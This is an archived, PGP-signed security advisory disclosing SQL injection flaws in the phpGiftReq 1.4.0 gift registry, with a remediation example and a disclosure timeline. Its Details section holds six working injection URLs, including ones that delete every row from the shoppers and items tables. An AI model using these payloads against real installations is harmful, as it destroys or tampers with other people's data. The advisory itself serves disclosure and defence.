phpGiftReq.txt

phpGiftReq.txt: Posted Jan 16, 2005; Authored by Madelman; phpGiftReq 1.4.0 suffers from multiple SQL injection flaws that allow for manipulation of the database.; tags | exploit, sql injection; SHA-256 | ccab1b3b37dc00b2ce75e69c79399eccdef31a6d7916011f4463b9fbd94ccd62; Download | Favorite | View

phpGiftReq.txt

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: phpGiftReq SQL Injection
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 16/01/2005
Severity: Moderately critical

Summary:
- --------

The PHP Gift Registry is a web-enabled gift registry intended for use
among a circle of family members or friends
(from vendor site: http://phpgiftreg.sourceforge.net/)

phpGiftReq doesn't validate the parameters. This allows SQL Injection
and modification of data in the database.

This vulnerability has been tested with phpGiftReq 1.4.0

Details:
- --------

Acknowledge all messages
http://[SERVER]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

Approve all pending requests
http://[SERVER]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

Decline all pending requests
http://[SERVER]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

Inserts current shopper for buying to user 3 without need for approval
http://[SERVER]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

Delete all data from table shoppers
http://[SERVER]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

Delete all data from table items
http://[SERVER]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1

I'm fairly sure there are a lot more places where SQL can be injected,
but I don't havetime to check them all.


Solution:
- ---------

All parameters should be converted to integers before creating the query.

Example:

Substitute

if ($action == "ack") {
~    $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
$_GET["messageid"];
~    mysql_query($query) or die("Could not query: " . mysql_error());
}

with

if ($action == "ack") {
~    $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
((int) $_GET["messageid"]);
~    mysql_query($query) or die("Could not query: " . mysql_error());
}


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qif3RWooxY20cIRAmSdAKCJEpPvYyfMpLC0YVP0XMz7OK7maQCcDZOC
DI/zEDH+ORCaUt2uvRiL1eo=
=44JS
-----END PGP SIGNATURE-----

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 87 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

phpGiftReq.txt

phpGiftReq.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpGiftReq.txt

Share This

phpGiftReq.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems